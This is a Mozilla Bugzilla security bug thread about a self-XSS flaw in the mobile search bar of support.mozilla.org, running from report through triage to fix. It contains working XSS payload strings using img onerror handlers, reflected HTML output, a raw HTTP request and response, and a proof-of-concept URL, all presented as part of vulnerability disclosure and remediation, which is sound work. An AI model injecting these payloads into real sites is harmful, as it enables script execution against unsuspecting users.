Closed
Bug 1238252
Opened 8 years ago
Closed 8 years ago
Self-XSS in support.mozilla.org Mobile Site's Main Search Bar
Categories
(support.mozilla.org :: General, defect)
support.mozilla.org
General
Tracking
(Not tracked)
VERIFIED
FIXED
People
(Reporter: justashar, Assigned: mythmon)
References
Details
(Keywords: sec-low, wsec-selfxss)
Attachments
(1 file)
148.31 KB,
image/jpeg
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 Steps to reproduce: Hi, I had found a XSS in support.mozilla.org Mobile Site's Main Search Bar. Open the following URL in any browser: https://support.mozilla.org/en-US/questions/new/desktop/download-and-install/form?&mobile=1 The site provides a search facility. Inject the following XSS payload in search bar and hit enter. '"><img src=x onerror=prompt(document.domain);> Actual results: The site executes JavaScript code. The screen-shot is also attached. Expected results: There is no output encoding at this time.
Comment 1•8 years ago
|
||
Ashar - Thank you for filing this bug regarding the suppoort search functionality. I have been able to replicate the behavior you suggested and will be performing some additional testing to understand it's exploitability for our users. I will add any additional details I find to this bug.
Comment 2•8 years ago
|
||
Safe injection: '"><img src=x onerror=alert('xss');> Resulting HTML response containing multiple copies of original injection without output encoding: </div><div class="results wrapper slide-on-exposed" id="instant-search-content"> <ol class="search-results"> <li class="document"> <a href="/en-US/kb/email-notifications-and-inbox-sync?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Email notifications and inbox sync</span> Never miss an email again! Here's how to set notifications and sync preferences on your Firefox OS device. </a> </li> <li class="document"> <a href="/en-US/kb/x-ray-goggles?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">What is X-Ray Goggles</span> <b>X</b>-Ray Goggles allow you to see the building blocks that make up websites on the internet, and then remix them into new creations. </a> </li> <li class="document"> <a href="/en-US/kb/how-customize-new-mail-sound?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">How to Customize the New Mail Sound</span> A how-to article on customizing the sound that plays when a new email message is downloaded. </a> </li> <li class="document"> <a href="/en-US/kb/firefox-no-longer-works-mac-os-x-10-5?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Firefox no longer works with Mac OS X 10.5</span> Firefox 16 is the last version of Firefox that works on Mac OS <b>X</b> 10.5 (Leopard). To stay safe online, we recommend upgrading your computer or operating system. </a> </li> <li class="document"> <a href="/en-US/kb/install-x-ray-goggles?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">How to Install X-Ray Goggles</span> Installing <b>X</b>-Ray Goggles is easy. You can then poke around on any web page and transform it into your own creation! Here's how. </a> </li> <li class="document"> <a href="/en-US/kb/firefox-no-longer-works-mac-os-10-4-or-powerpc?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Firefox no longer works with Mac OS X 10.4 or PowerPC processors</span> Firefox 3.6.28 is the last Firefox version to work on Mac OS <b>X</b> 10.4 or on Mac OS <b>X</b> 10.5 with a PowerPC Mac. Switch to a newer computer to stay safe online. </a> </li> <li class="document"> <a href="/en-US/kb/scrolling-issue-firefox-os-x-mavericks?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Scrolling issue on Firefox after upgrading to OS X Mavericks</span> This article shows you how to address scrolling issue caused by upgrading to OS <b>X</b> Mavericks. </a> </li> <li class="document"> <a href="/en-US/kb/ringer-sound-and-vibrate-settings?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Ringer, sound and vibrate settings</span> Learn how to change your <b>alerts</b> or ringtones, add songs as ringtones, or turn your phone on vibrate or silent mode. </a> </li> <li class="document"> <a href="/en-US/kb/inspecting-and-remixing-your-first-web-page?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Inspecting and remixing your first web page</span> <b>X</b>-Ray Goggles lets you poke around the elements of a web page and remix them into new creations. Learn how to swap images, text, and more. </a> </li> <li class="document"> <a href="/en-US/kb/am-i-really-hacking?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Am I really hacking a web page?</span> Understand the difference between hacking with <b>X</b>-Ray Goggles, where you fork a copy of a webpage, versus the general term "hacking" where you break into a page. </a> </li> </ol> </div>
Reporter | ||
Comment 3•8 years ago
|
||
Yes. The reflection of injection in DOM appears so many times and there is no output encoding ...
Updated•8 years ago
|
Summary: XSS in support.mozilla.org Mobile Site's Main Search Bar → DOM-based XSS in support.mozilla.org Mobile Site's Main Search Bar
Comment 4•8 years ago
|
||
Ashar - Although I agree there is a lack of output encoding here, which should be fixed, I cannot see a reasonable mechanism for an attacker to leverage such a payload in a practical manner. This seems like the only reasonable exploitation vector would be for a user to be tricked into typing a malicious payload into the search bar rather than a malicious link in say a phishing scam. Do you agree? If not, could you explain and perhaps provide an example case that would suggest further impact? Again, many thanks for this submission!
Comment 5•8 years ago
|
||
In other words, I'm suggesting that the exploitation vector is limited to Self-XSS (https://en.wikipedia.org/wiki/Self-XSS), but would like your feedback to make sure we're in sync with our understanding.
Reporter | ||
Comment 6•8 years ago
|
||
You're right. It is Self-XSS but I hope it will be fixed.
Updated•8 years ago
|
Comment 8•8 years ago
|
||
HTTP Request: GET /en-US/search?format=json&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%27xss%27)%3B%3E+&q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%27xss%27)%3B%3E+ HTTP/1.1 Host: support.mozilla.org User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://support.mozilla.org/en-US/questions/new/desktop/download-and-install/form?&mobile=1 ***REDACTED_SESSION_DATA*** X-Requested-With: XMLHttpRequest Connection: close HTTP Response: HTTP/1.1 200 OK Server: Apache Vary: X-Mobile,User-Agent X-Backend-Server: support2.webapp.phx1.mozilla.com Cache-Control: no-cache, must-revalidate Content-Type: application/json Strict-Transport-Security: max-age=31536000 Public-Key-Pins: max-age=1296000; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; Date: Mon, 11 Jan 2016 15:55:39 GMT Keep-Alive: timeout=5, max=864 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-XSS-Protection: 1; mode=block Pragma: no-cache X-Content-Type-Options: nosniff Connection: close X-Robots-Tag: noodp X-Frame-Options: DENY X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 4288 {"q":"'\"><img src=x onerror=alert('xss');> ","fallback_results":null,"pagination":{"has_next":true,"span":4,"url":"https://support.mozilla.org/en-US/search?q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&format=json","max":10,"number":1,"page_range":[1,2,3,4,5,6,7,8],"has_previous":false,"dotted_upper":true,"num_pages":47,"dotted_lower":false},"total":10,"num_results":467,"w":1,"products":[{"slug":"firefox","title":"Firefox"},{"slug":"mobile","title":"Firefox for Android"},{"slug":"ios","title":"Firefox for iOS"},{"slug":"firefox-os","title":"Firefox OS"},{"slug":"focus-firefox","title":"Focus by Firefox"},{"slug":"thunderbird","title":"Thunderbird"},{"slug":"webmaker","title":"Webmaker"}],"product_titles":"All Products","results":[{"search_summary":"Never miss an email again! Here's how to set notifications and sync preferences on your Firefox OS device.","title":"Email notifications and inbox sync","url":"/en-US/kb/email-notifications-and-inbox-sync","explanation":"","rank":1,"score":0.027203325,"type":"document","id":19233},{"search_summary":"<b>X</b>-Ray Goggles allow you to see the building blocks that make up websites on the internet, and then remix them into new creations.","title":"What is X-Ray Goggles","url":"/en-US/kb/x-ray-goggles","explanation":"","rank":2,"score":0.010656366,"type":"document","id":14438},{"search_summary":"Firefox 16 is the last version of Firefox that works on Mac OS <b>X</b> 10.5 (Leopard). To stay safe online, we recommend upgrading your computer or operating system.","title":"Firefox no longer works with Mac OS X 10.5","url":"/en-US/kb/firefox-no-longer-works-mac-os-x-10-5","explanation":"","rank":3,"score":0.009599386,"type":"document","id":11507},{"search_summary":"Installing <b>X</b>-Ray Goggles is easy. You can then poke around on any web page and transform it into your own creation! Here's how.","title":"How to Install X-Ray Goggles","url":"/en-US/kb/install-x-ray-goggles","explanation":"","rank":4,"score":0.009551151,"type":"document","id":14865},{"search_summary":"A how-to article on customizing the sound that plays when a new email message is downloaded.","title":"How to Customize the New Mail Sound","url":"/en-US/kb/how-customize-new-mail-sound","explanation":"","rank":5,"score":0.009239691,"type":"document","id":17203},{"search_summary":"Firefox 3.6.28 is the last Firefox version to work on Mac OS <b>X</b> 10.4 or on Mac OS <b>X</b> 10.5 with a PowerPC Mac. Switch to a newer computer to stay safe online.","title":"Firefox no longer works with Mac OS X 10.4 or PowerPC processors","url":"/en-US/kb/firefox-no-longer-works-mac-os-10-4-or-powerpc","explanation":"","rank":6,"score":0.008637331,"type":"document","id":9263},{"search_summary":"This article shows you how to address scrolling issue caused by upgrading to OS <b>X</b> Mavericks.","title":"Scrolling issue on Firefox after upgrading to OS X Mavericks","url":"/en-US/kb/scrolling-issue-firefox-os-x-mavericks","explanation":"","rank":7,"score":0.0076004304,"type":"document","id":20117},{"search_summary":"Learn how to change your <b>alerts</b> or ringtones, add songs as ringtones, or turn your phone on vibrate or silent mode.","title":"Ringer, sound and vibrate settings","url":"/en-US/kb/ringer-sound-and-vibrate-settings","explanation":"","rank":8,"score":0.0020853204,"type":"document","id":13218},{"search_summary":"<b>X</b>-Ray Goggles lets you poke around the elements of a web page and remix them into new creations. Learn how to swap images, text, and more.","title":"Inspecting and remixing your first web page","url":"/en-US/kb/inspecting-and-remixing-your-first-web-page","explanation":"","rank":9,"score":0.00095560943,"type":"document","id":14439},{"search_summary":"On Mac OS <b>X</b> 10.9.5 or higher, Apple shows a security warning for apps that are not installed through the App Store. Follow these steps if you see the warning while trying to open a Firefox Marketplace app.","title":"How do I change my Mac Security Settings so I can open Firefox Marketplace apps?","url":"/en-US/kb/mac-security-settings-firefox-marketplace","explanation":"","rank":10,"score":0.00094013184,"type":"document","id":24236}],"lang_name":"English"}
Comment 9•8 years ago
|
||
In the above provided request/response, this demonstrates that the request generated by the mobile search bar is generating a JSON typed response, which contains the reflected values that were injected. This I suspect is then interpreted by the application resulting in the self-XSS. If an attacker attempted to weaponize this, via a get URL, this should just result in a JSON response in the browser. Here's an example GET-based PoC that demonstrates this: https://support.mozilla.org/en-US/search?format=json&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+ The resulting browser would attempt to parse the JSON and would fail to validate.
Reporter | ||
Comment 10•8 years ago
|
||
The resulting response page has been served with a proper content type i.e., Content-Type:application/json and that's why XSS will not work as far as modern browsers are concerned. The only option left is Self-XSS.
Comment 11•8 years ago
|
||
mythmon: Can you have a look at this? Looks like we could improve some of the output encoding for the mobile components of search in support.mozilla.org and address this.
Flags: needinfo?(mcooper)
Assignee | ||
Comment 12•8 years ago
|
||
Jonathan: At first glance, this seems to be a similar issue to bug 1223970. Like in that bug, the search API should not HTML encode the results because those results may be consumed in other contexts. Instead the JS running on the page should be responsible for escaping the content. It should be an easy fix for us to avoid the self-XSS.
Flags: needinfo?(mcooper)
Comment 13•8 years ago
|
||
mythmon: that's great, thanks! I agree that JS running on the page should be safely handling the JSON content.
Comment 14•8 years ago
|
||
This bug is eluded to in this blog post by Ashar: https://respectxss.blogspot.de/2016/01/persistent-xss-in-mozilla-add-ons-site.html
Reporter | ||
Comment 15•8 years ago
|
||
Without mentioning the details (where and how), I only mentioned the bug. Is there something wrong?
Assignee | ||
Comment 16•8 years ago
|
||
PR with a fix here (unmerged, and undeployed): https://github.com/mozilla/kitsune/pull/2771
Comment 17•8 years ago
|
||
Is it gonna be fixed?
Comment 18•8 years ago
|
||
Ashar - No, there is nothing wrong. It's our preference that we not share anything about a security bug until it's fixed and published. I was linking your blog post above for context so those working this bug are aware of it's presence. Lnazi - Yes, it sounds like it's going to be fixed. See above for mythmon's PR, which is pending review.
Comment 19•8 years ago
|
||
Jonathan- Great :) . the mobile version of Mozilla.org needs to be fixed because I stumbled upon a few more vulnerabilities which I will post soon
Comment 21•8 years ago
|
||
:( mine is duplicate?
Comment 22•8 years ago
|
||
Lnazi - yes, #1238547 is a duplicate, meaning that both submissions target the same code deficiency in the same way (despite variations in the XSS payload).
Comment 23•8 years ago
|
||
What are requirements for bounties or hof?
Comment 24•8 years ago
|
||
Is there any chance for my bugs?
Comment 25•8 years ago
|
||
Lnazi - Please see this page for sites and bug types that would be eligible for bounties => https://www.mozilla.org/en-US/security/bug-bounty/faq-webapp/#eligible-bugs
Comment 26•8 years ago
|
||
Mine is xss (Dom based) so do u think there s any chance of bounty? And when will the security team take action for it?
Comment 27•8 years ago
|
||
Lnazi - You are not likely to receive a bounty for #1238547 because Ashar reported this issue first in #1238252.
Updated•8 years ago
|
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•8 years ago
|
Assignee: nobody → rdalal
Status: NEW → ASSIGNED
Assignee | ||
Updated•8 years ago
|
Assignee: rdalal → mcooper
Assignee | ||
Comment 28•8 years ago
|
||
The fix for this has been pushed to production.
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Reporter | ||
Comment 29•8 years ago
|
||
Good. I checked and it is fixed now.
Assignee | ||
Updated•8 years ago
|
Status: RESOLVED → VERIFIED
Updated•8 years ago
|
Flags: sec-bounty?
Comment 30•8 years ago
|
||
This is a self-XSS and rated sec-low as a result. This is not eligible for a bug bounty.
Flags: sec-bounty? → sec-bounty-
Updated•8 years ago
|
Group: websites-security
Updated•8 years ago
|
Keywords: wsec-xss → wsec-selfxss
You need to log in
before you can comment on or make changes to this bug.
Description
•